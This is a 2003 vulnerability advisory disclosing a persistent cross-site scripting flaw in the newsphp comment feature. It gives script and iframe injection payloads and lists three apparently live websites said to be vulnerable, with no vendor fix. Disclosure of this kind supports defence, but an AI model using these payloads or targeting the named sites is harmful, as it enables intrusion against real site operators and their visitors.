------------------------------------------------------------------
          - EXPL-A-2003-003 exploitlabs.com Advisory 003
------------------------------------------------------------------
                        -=- newsphp -=-




06/05/03
Donnie Werner
http://exploitlabs.com
http://frame4.com

=========================================
THIS IS NOT NPHP
http://www.nphp.net/
http://www.secunia.com/advisories/8942/
=========================================




Vunerability(s):
----------------
1.Persistant XSS JavaScript injection



Product:
--------

newsphp
http://www.newsphp.com

Description of product:
-----------------------

"Features include: Easy customization with 
config script; 
Easy setup; 
Post, edit and delete news items; 
Headlines script lets you display the headline
of your latest news. Uses MySQL database for
speed and reliability; Archive feature that
lets your users view old news; 
Easy user management with 2 different user access levels;
Full banner management with statistics; 
online news style editing and much more... 

Ever wanted to make your site look like CNN, WaPost, 
USA Today, BBC, CNBC?
Try NewsPHP!" 

The system requirements for NewsPHP are as follows:
PHP
Web Server (UNIX/NT)
MySQL Server
Must support SSI's (Server Side Includes)



Note:
-----

looks like they were the target of a unsucsesfull attack evidenced by
http://members.newsphp.com/banner/1028674461.gif dated 07.08.02

http://members.newsphp.com/newsadmin/useradmin.php?action=banner



Vunerable Instalations:
-----------------------

http://www.renotahoetoday.com/index.php?view_comments=17
http://www.caraibesfm.com/index.php?view_comments=189
http://www.hoosierairnews.com/index.php?view_comments=210


VUNERABILITY / EXPLOIT
======================
 newsphp has a comment freature, if enabled posting of comments
containging <script> or <iframe> is excecuted and persists in the
next users ( all ) sessions / views.


Remote:
-------

<script>alert("as of June 5, 2003 newsphp is vunerable to xss - discovered by morning_wood http://exploitlabs.com")</script>
<SCRIPT>alert(document.domain);</SCRIPT>
<iframe src="http://whatismyip.com"></iframe>

Vendor Fix:
-----------

No fix on 0day


Vendor Contact:
---------------

Concurrent to this date of release
mailto:support@newsphp.com

Credits:
--------

Donnie Werner
http://exploitlabs.com "where finding your holes is job one, and plugging them twice the phun"
morning_wood@exploitlabs.com
Corporate Security Needs at http://fram4.com Security Systems